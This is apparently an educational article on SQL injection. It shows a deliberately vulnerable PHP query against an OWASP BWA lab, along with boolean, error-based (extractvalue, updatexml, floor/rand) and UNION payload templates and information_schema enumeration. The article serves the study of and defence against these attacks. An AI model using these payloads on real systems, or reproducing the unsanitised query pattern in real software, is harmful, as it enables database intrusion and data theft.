Mastering SQL Injection: Types, Techniques, and Real‑World Examples

During an internship focused on web security, the author used Python and regular expressions to study SQL injection, starting with basic concepts and a simple vulnerable PHP script.

About SQL Injection

SQL injection occurs when malicious SQL commands are inserted into web form inputs, causing the server to execute unintended queries.

To experiment, set up a vulnerable target using OWASP BWA. The following PHP code demonstrates the flaw:

$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');
$num = mysql_numrows($result);

This script directly injects the id parameter into the SQL statement without validation, allowing any input to be executed.

For example, submitting 1' or '1'='1 changes the query to:

SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1'

The OR '1'='1 clause forces the condition to be true, causing the database to return all rows from the users table.

Boolean‑Based Injection

Boolean‑based attacks rely on the logical operators AND and OR in WHERE clauses. By observing differences in the application's response to true vs. false conditions, an attacker can infer data.

Examples: mysql> SELECT * FROM students WHERE TRUE; returns all rows, while: mysql> SELECT * FROM students WHERE FALSE; returns an empty set. By appending conditions such as AND 1=1 or OR 1=1, the attacker can manipulate the query outcome.

Typical Boolean payloads include dictionary brute‑force, binary search on string length, and character‑by‑character extraction using SUBSTR and LENGTH functions.

Error‑Based Injection

Error‑based attacks exploit database error messages to retrieve data. Functions like COUNT(), RAND(), FLOOR(), GROUP BY, and CONCAT() are combined to force a duplicate‑key error that reveals concatenated data.

Example formula:

username=admin' and (select 1 from (select count(), concat(floor(rand(0)*2),0x23,(YOUR_SQL_HERE)) x from information_schema.tables group by x) a) and '1'='1

Another technique uses XML functions available in MySQL 5.1+:

username=admin' and (extractvalue(1, concat(0x7e,(YOUR_SQL_HERE)))) and '1'='1

or

username=admin' and (updatexml(1, concat(0x7e,(YOUR_SQL_HERE)),1)) and '1'='1

These payloads cause the database to return the result of YOUR_SQL_HERE inside an error message.

UNION‑Based Injection

UNION‑based attacks merge the results of a malicious SELECT with the original query, allowing direct retrieval of data.

Typical steps:

Determine the number of columns by trial, e.g., -1 UNION SELECT 1, -1 UNION SELECT 1,2, etc., until the page renders without error.

Identify which columns are reflected in the response.

Craft a payload that selects desired data, such as:

-1 UNION SELECT schema_name, NULL FROM information_schema.schemata

Examples retrieving database, table, and column names are shown using information_schema queries.

UNION requires the injected SELECT to have the same number of columns and compatible data types as the original query.

Summary of Injection Types

In total, five main SQL injection techniques are covered: Boolean‑based, Error‑based, UNION‑based, Stacked‑queries (multiple statements separated by ;), and Time‑based blind (using SLEEP()). An additional “inline” injection overlaps with the previous methods.

Understanding each method’s principles, payload construction, and limitations helps security professionals assess and mitigate vulnerabilities in web applications.